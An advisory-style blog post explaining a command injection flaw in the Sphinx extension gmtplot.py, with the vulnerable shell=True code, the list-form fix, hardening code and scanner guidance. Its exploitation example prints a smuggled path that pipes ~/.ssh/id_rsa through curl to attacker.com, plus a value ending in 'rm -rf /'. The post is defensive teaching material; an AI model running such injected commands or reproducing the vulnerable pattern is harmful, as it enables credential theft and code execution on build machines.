Shell Injection in Sphinx Extensions: How a Docs Tool Became a Security Risk
Severity: Critical | CVE Class: Command Injection (CWE-78) | Fixed In: PR - "fix: sanitize subprocess call in gmtplot.py"
Introduction
When developers think about attack surfaces, they typically focus on web endpoints, authentication systems, or data storage. Rarely does anyone look twice at the documentation pipeline. Yet documentation tooling — especially custom Sphinx extensions that process contributor-supplied content — can harbor some of the most dangerous vulnerabilities in a codebase.
This post covers a critical shell injection vulnerability discovered and fixed in gmtplot.py, a custom Sphinx extension used to render GMT (Generic Mapping Tools) plots in documentation. The vulnerability allowed an attacker with the ability to contribute RST documentation files to execute arbitrary shell commands on any machine that built the documentation.
If your CI/CD pipeline builds docs automatically — and most modern projects do — this means remote code execution on your build infrastructure.
The Vulnerability Explained
What Is Shell Injection?
Shell injection (also known as OS command injection) occurs when an application passes unsanitized, user-controlled data to a system shell interpreter. When Python's subprocess.run() is called with shell=True, the entire command string is handed to /bin/sh for interpretation. This means the shell will parse and execute any valid shell syntax embedded in the string — including metacharacters like:
| Metacharacter | Effect |
|---|---|
| ; | Execute next command sequentially |
| \| | Pipe output to another command |
| && | Execute next command if first succeeds |
| ` ` | Command substitution (backticks) |
| $() | Command substitution (modern syntax) |
| > / >> | Redirect output to a file |
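To make the mechanism concrete, here is a minimal sketch (assuming a POSIX system where /bin/sh, echo, and tr are available). The command string is a harmless illustration that is not taken from the extension. It shows that passing shell=True behaves like invoking /bin/sh -c on the same string, so every metacharacter in the string is interpreted.

```python
import subprocess

# A harmless command string that uses three shell features:
# ';' (sequencing), '$()' (command substitution) and '|' (pipe).
cmd = "echo one; echo $(echo two) | tr a-z A-Z"

# shell=True hands the whole string to the shell for parsing...
via_flag = subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout

# ...which on POSIX amounts to running /bin/sh -c yourself.
via_sh = subprocess.run(["/bin/sh", "-c", cmd], capture_output=True, text=True).stdout

print(via_flag)
print(via_flag == via_sh)
```

Both calls produce the same two lines of output, because in both cases the shell, not Python, decides what the string means.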
The Vulnerable Code
In docs/source/_extensions/gmtplot.py, at lines 173, 174, and 197, the extension invoked subprocess.run() like this:
# VULNERABLE CODE (before fix)
import subprocess
# ps_images[0] is derived from user-supplied RST documentation content
ps_file = ps_images[0]
# shell=True + unsanitized input = shell injection
subprocess.run(f"gmt psconvert {ps_file} -A -Tg", shell=True)
subprocess.run(f"gmt psconvert {ps_file} -A -Tf", shell=True)
# Also vulnerable at line 197
subprocess.run(f"convert {ps_file} output.png", shell=True)
The variable ps_images[0] is a file path derived from the processing of RST source files — content that documentation contributors control.
How Could It Be Exploited?
An attacker who can submit a pull request (or directly push to a branch) containing RST documentation files can craft a filename or directive that injects shell commands. Here's a concrete example:
Step 1: The attacker contributes an RST file containing a GMT plot directive with a malicious path:
.. gmtplot::
   :caption: Innocent-looking map

   # Script that generates a file with a dangerous name
Step 2: The extension processes this and constructs a path like:
legitimate_plot.ps; curl https://attacker.com/exfil?data=$(cat ~/.ssh/id_rsa | base64) #
Step 3: When subprocess.run() executes with shell=True, the shell sees:
gmt psconvert legitimate_plot.ps; curl https://attacker.com/exfil?data=$(cat ~/.ssh/id_rsa | base64) # -A -Tg
The shell dutifully executes both the legitimate GMT command and the attacker's injected command.
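The three steps can be reproduced safely. The sketch below is an illustration under stated assumptions: it reuses the f-string pattern from the vulnerable code but prepends echo so that gmt is never run, and it swaps the attacker's curl call for a harmless echo INJECTED. The helper name build_command is hypothetical. It assumes a POSIX shell.

```python
import subprocess


def build_command(ps_file: str) -> str:
    # Same f-string pattern as the vulnerable code. The leading "echo" is an
    # assumption for this demo so the real gmt binary is never invoked.
    return f"echo gmt psconvert {ps_file} -A -Tg"


# Harmless stand-in for the attacker-controlled path.
payload = "legitimate_plot.ps; echo INJECTED #"

result = subprocess.run(
    build_command(payload), shell=True, capture_output=True, text=True
)
lines = result.stdout.splitlines()
print(lines)
```

The first line of output is the intended command, cut short at the semicolon. The second comes from the injected command. The trailing -A -Tg never appears because the # turned it into a shell comment.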
Real-World Impact
The consequences depend on the context in which documentation is built, but consider:
- CI/CD Compromise: Most projects auto-build docs in pipelines. A malicious PR could exfiltrate secrets, install backdoors, or pivot to internal infrastructure.
- Developer Machine Compromise: Any developer who checks out the branch and runs make html locally becomes a victim.
- Supply Chain Attack: If documentation is built as part of a release process, an attacker could tamper with build artifacts or inject malicious code into published packages.
- Secret Exfiltration: Build environments commonly contain API keys, cloud credentials, SSH keys, and deployment tokens — all accessible to injected commands.
This is not theoretical. Similar vulnerabilities have been exploited in CI/CD systems to steal secrets and compromise software supply chains.
The Fix
What Changed?
The fix eliminates the root cause by removing shell=True and passing command arguments as a list instead of a string. When subprocess.run() receives a list and shell=True is not set, Python starts the program directly (through an exec-family system call on POSIX). No shell is involved, so no shell metacharacters are interpreted.
# FIXED CODE (after fix)
import subprocess
# ps_images[0] is still user-derived, but now safely handled
ps_file = ps_images[0]
# Pass as a list — no shell involved, metacharacters are treated as literals
subprocess.run(["gmt", "psconvert", ps_file, "-A", "-Tg"], check=True)
subprocess.run(["gmt", "psconvert", ps_file, "-A", "-Tf"], check=True)
# Also fixed at line 197
subprocess.run(["convert", ps_file, "output.png"], check=True)
Why This Works
When you pass a list to subprocess.run():
- Python calls os.execvp() (or equivalent) directly
- The operating system treats each list element as a discrete argument
- No shell is spawned, so no shell parsing occurs
- A filename like file.ps; rm -rf / is passed literally as the filename argument to gmt psconvert. The semicolon is just a character, not a command separator
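The shell injection is neutralized because the shell, the interpreter that gives metacharacters their power, is never invoked. List form does not address argument injection (CWE-88), however: a filename that begins with - can still be read as an option by the program being called, which is one reason input validation remains worthwhile.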
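The list-form behaviour can be observed directly. In this sketch a child Python process stands in for gmt psconvert (an assumption made so the example runs without GMT installed) and simply prints the arguments it received.

```python
import subprocess
import sys

# Hypothetical stand-in for "gmt psconvert": a child Python process that
# prints the argument list it was started with.
ARGV_ECHO = [sys.executable, "-c", "import sys; print(repr(sys.argv[1:]))"]

payload = "file.ps; rm -rf /"

result = subprocess.run(
    ARGV_ECHO + [payload, "-A", "-Tg"],
    capture_output=True,
    text=True,
    check=True,
)
received = result.stdout.strip()
print(received)
```

The payload arrives as one argument, semicolon and spaces included, and nothing after the semicolon is executed.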
Additional Hardening (Defense in Depth)
Beyond the primary fix, consider these additional hardening measures:
import subprocess
from pathlib import Path

def safe_convert(ps_file: str, output_dir: str) -> None:
    """Safely convert PS file with input validation."""
    # 1. Resolve the path and confirm it stays within the expected directory
    #    (Path.is_relative_to requires Python 3.9+)
    ps_path = Path(ps_file).resolve()
    allowed_base = Path(output_dir).resolve()
    if not ps_path.is_relative_to(allowed_base):
        raise ValueError(f"Path traversal detected: {ps_file}")
    # 2. Validate file extension
    if ps_path.suffix.lower() not in ('.ps', '.eps'):
        raise ValueError(f"Unexpected file type: {ps_path.suffix}")
    # 3. Use list form (no shell=True): primary defense
    subprocess.run(
        ["gmt", "psconvert", str(ps_path), "-A", "-Tg"],
        capture_output=True,
        text=True,
        timeout=60,  # 4. Add timeout to prevent resource exhaustion
        check=True,  # 5. Raise on non-zero exit code
    )
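The two validation checks can be exercised on their own, without GMT installed. The sketch below pulls them into a hypothetical helper, check_ps_path (not part of the extension), and runs it against a temporary directory. It assumes Python 3.9+ for Path.is_relative_to.

```python
import tempfile
from pathlib import Path


def check_ps_path(ps_file: str, allowed_base: str) -> Path:
    """Hypothetical helper: return the resolved path or raise ValueError."""
    ps_path = Path(ps_file).resolve()
    base = Path(allowed_base).resolve()
    if not ps_path.is_relative_to(base):  # Python 3.9+
        raise ValueError(f"Path traversal detected: {ps_file}")
    if ps_path.suffix.lower() not in (".ps", ".eps"):
        raise ValueError(f"Unexpected file type: {ps_path.suffix}")
    return ps_path


def is_accepted(ps_file: str, allowed_base: str) -> bool:
    try:
        check_ps_path(ps_file, allowed_base)
        return True
    except ValueError:
        return False


with tempfile.TemporaryDirectory() as build_dir:
    base = Path(build_dir)
    results = {
        "inside": is_accepted(str(base / "map.ps"), build_dir),
        "traversal": is_accepted(str(base / ".." / "map.ps"), build_dir),
        "wrong_suffix": is_accepted(str(base / "map.sh"), build_dir),
    }

print(results)
```

Because the path is resolved to an absolute path before it is used, it can no longer begin with a hyphen, which also limits the room for option-style arguments.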
Prevention & Best Practices
The Golden Rule: Never Use shell=True with External Input
This is the single most important takeaway. Python's subprocess documentation makes the same point in its Security Considerations section: when the shell is invoked explicitly via shell=True, it is the application's responsibility to quote all whitespace and metacharacters appropriately to avoid shell injection vulnerabilities.
Follow this decision tree:
Do you need shell features (pipes, redirects, globs)?
├── YES → Can you redesign to avoid them?
│ ├── YES → Redesign (preferred)
│ └── NO → Use shell=True ONLY with fully hardcoded strings
│ Never interpolate external data
└── NO → Always use shell=False (list form)
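For the "Redesign" branch, pipes and redirects can usually be expressed in Python itself. The following is a minimal sketch in which two child Python processes stand in for real tools (an assumption, so that it runs anywhere). It shows a pipe and an output redirect without any shell.

```python
import subprocess
import sys
import tempfile
from pathlib import Path

# Stand-ins for real commands: one prints two lines, the other sorts stdin.
producer = [sys.executable, "-c", "print('beta'); print('alpha')"]
consumer = [
    sys.executable,
    "-c",
    "import sys; sys.stdout.write(''.join(sorted(sys.stdin)))",
]

# Equivalent of "producer | consumer": capture the first process's output
# and feed it to the second one as stdin.
first = subprocess.run(producer, capture_output=True, text=True, check=True)
second = subprocess.run(
    consumer, input=first.stdout, capture_output=True, text=True, check=True
)
piped = second.stdout

# Equivalent of "producer > out.txt": pass an open file object as stdout.
with tempfile.TemporaryDirectory() as tmp:
    out_path = Path(tmp) / "out.txt"
    with open(out_path, "w") as fh:
        subprocess.run(producer, stdout=fh, check=True)
    redirected = out_path.read_text()

print(piped, redirected, sep="---\n")
```

Globs can be handled the same way with the standard glob module or Path.glob, passing the expanded names as list elements.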
Input Validation and Allowlisting
When you must work with user-supplied paths or filenames, validate them strictly:
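import re

# Allowlist: starts with a letter or digit, continues with letters, digits,
# hyphens, or underscores, and ends in .ps or .eps
_PLOT_NAME = re.compile(r'[A-Za-z0-9][A-Za-z0-9_-]*\.(ps|eps)')

def validate_plot_filename(filename: str) -> bool:
    """Allowlist-based filename validation."""
    # fullmatch, unlike match with a trailing $, also rejects a trailing newline.
    # The pattern leaves no room for '/' or '..', so path traversal is excluded,
    # and the name cannot start with '-', so it cannot pose as an option.
    return _PLOT_NAME.fullmatch(filename) is not None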
Use shlex.quote() as a Last Resort
If you absolutely cannot avoid shell=True, use shlex.quote() to escape arguments:
import shlex
import subprocess
# Last resort only — prefer list form instead
safe_path = shlex.quote(ps_file)
subprocess.run(f"gmt psconvert {safe_path} -A -Tg", shell=True)
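⚠️ Warning: This is a mitigation, not a cure. shlex.quote() is designed for POSIX shells only, and every interpolated value must be quoted individually. The list-form approach is always preferred.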
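To see what the quoting does, this sketch runs the same harmless payload used for illustration (echo INJECTED in place of a real attack, and echo in place of gmt, both assumptions) through shlex.quote() before interpolation. It assumes a POSIX shell.

```python
import shlex
import subprocess

payload = "legitimate_plot.ps; echo INJECTED #"

# shlex.quote wraps the value in single quotes so the shell treats it as
# one literal word.
quoted = shlex.quote(payload)

# "echo" stands in for gmt so the demo has no external dependencies.
result = subprocess.run(
    f"echo {quoted} -A -Tg", shell=True, capture_output=True, text=True
)
output = result.stdout
print(quoted)
print(output)
```

The semicolon and the # now reach echo as plain text, and the trailing flags are preserved instead of being commented out.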
Relevant Security Standards
| Standard | Reference | Description |
|---|---|---|
| OWASP | A03:2021 – Injection | Injection ranks #3 in OWASP Top 10 |
| CWE | CWE-78 | OS Command Injection |
| CWE | CWE-88 | Argument Injection |
| SANS | CWE/SANS Top 25 | Most Dangerous Software Errors |
Detection Tools
Add these to your security pipeline to catch similar issues:
- Bandit: Python-specific SAST tool. Rule B602 flags subprocess calls made with shell=True; B603 flags subprocess calls made without a shell so that their arguments can be reviewed for untrusted input.
    pip install bandit
    bandit -r . -t B602,B603
- Semgrep: Pattern-based code scanning with rules for subprocess misuse.
    semgrep --config "p/python" .
- CodeQL: GitHub's semantic code analysis; has built-in queries for command injection
- Safety: Scans Python dependencies for known vulnerabilities
- Pre-commit hooks: Run Bandit automatically before every commit
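To give a feel for what such a check looks for, here is a toy sketch built on Python's ast module. It is not how Bandit or Semgrep are implemented, and the function name find_shell_true is hypothetical. It only reports calls that pass the literal keyword shell=True, which is far narrower than what the real tools cover.

```python
import ast


def find_shell_true(source: str) -> list[int]:
    """Return line numbers of calls that pass the literal keyword shell=True."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        for kw in node.keywords:
            if (
                kw.arg == "shell"
                and isinstance(kw.value, ast.Constant)
                and kw.value.value is True
            ):
                hits.append(node.lineno)
    return sorted(hits)


# The sample is only parsed, never executed.
sample = '''import subprocess
subprocess.run(f"gmt psconvert {ps_file} -A -Tg", shell=True)
subprocess.run(["gmt", "psconvert", ps_file, "-A", "-Tg"], check=True)
'''

flagged = find_shell_true(sample)
print(flagged)
```

Only the second line of the sample is reported; the list-form call on the third line passes.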
Secure Code Review Checklist
When reviewing code that invokes subprocesses, ask:
- [ ] Is shell=True used? If so, is it absolutely necessary?
- [ ] Does any part of the command string come from external input (files, environment, user input, network)?
- [ ] Are file paths validated against an allowlist of expected directories?
- [ ] Is there a timeout to prevent resource exhaustion?
- [ ] Are errors handled to prevent information leakage via exception messages?
- [ ] Is the principle of least privilege applied (does the process need all these permissions)?
A Note on Documentation Pipelines
This vulnerability highlights a frequently overlooked truth: your documentation pipeline is part of your attack surface.
Modern documentation workflows often include:
- Automatic builds triggered by pull requests from external contributors
- Sphinx extensions that execute code to generate examples and plots
- Jupyter notebooks rendered as documentation
- Auto-generated API docs that execute import statements
Each of these is a potential code execution vector. Treat your documentation build environment with the same security rigor as your production build:
- Sandbox doc builds in isolated environments with no access to production secrets
- Require review before building PRs from first-time contributors
- Use separate secret stores — doc build environments should not have the same credentials as release pipelines
- Audit custom Sphinx extensions — they often run with full filesystem and network access
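One small, partial step toward the first and third points is to start the docs build with a scrubbed environment, so that a compromised extension cannot read secrets from inherited variables. The sketch below is an assumption-laden illustration: the allowlist, the DEPLOY_TOKEN variable, and the scrubbed_env helper are hypothetical, a child Python process stands in for the real build command, and it assumes a POSIX system. It is not a sandbox and does nothing about filesystem or network access.

```python
import os
import subprocess
import sys

# Hypothetical allowlist; a real docs build may need other variables.
ALLOWED_VARS = ("PATH", "HOME", "LANG")


def scrubbed_env(allowed=ALLOWED_VARS) -> dict:
    """Copy only allowlisted variables from the current environment."""
    return {name: os.environ[name] for name in allowed if name in os.environ}


# Simulated secret, set only for this demonstration.
os.environ["DEPLOY_TOKEN"] = "not-a-real-secret"

# Stand-in for the docs build: a child process that looks for the secret.
probe = [sys.executable, "-c", "import os; print(os.environ.get('DEPLOY_TOKEN'))"]

inherited = subprocess.run(
    probe, capture_output=True, text=True, check=True
).stdout.strip()
scrubbed = subprocess.run(
    probe, env=scrubbed_env(), capture_output=True, text=True, check=True
).stdout.strip()

print(inherited, scrubbed)
```

With the default inherited environment the child sees the token; with the scrubbed one it does not.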
Conclusion
A single shell=True in a documentation extension turned a benign plot-rendering tool into a potential remote code execution vulnerability. The fix was straightforward — replace string interpolation with a properly structured argument list — but the implications were significant.
Key takeaways:
- shell=True + user input = shell injection. This is one of the most reliable rules in security.
- Documentation tooling is an attack surface. CI/CD pipelines that auto-build docs are especially at risk.
- The fix is simple: use subprocess.run(["cmd", "arg1", "arg2"]) instead of subprocess.run(f"cmd {arg}", shell=True).
- Layer your defenses: input validation, path restrictions, and static analysis tools complement the primary fix.
- Automate detection: Bandit and Semgrep can catch these issues before they reach production.
Security vulnerabilities don't only live in authentication systems and API endpoints. They hide in build scripts, test helpers, and documentation generators — the parts of a codebase that developers trust implicitly. The best defense is consistent, skeptical review of any code that touches external input, regardless of how "internal" it seems.
Secure every layer. Trust no input.
This vulnerability was identified and fixed as part of an automated security scanning process. If you maintain Sphinx extensions or other documentation tooling that invokes subprocesses, audit your code for similar patterns today.
References: CWE-78 | OWASP Injection | Python subprocess docs | Bandit B602